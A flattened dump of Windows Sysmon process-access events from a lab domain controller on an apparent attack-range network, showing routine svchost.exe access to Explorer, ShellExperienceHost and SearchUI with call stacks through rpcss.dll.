08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 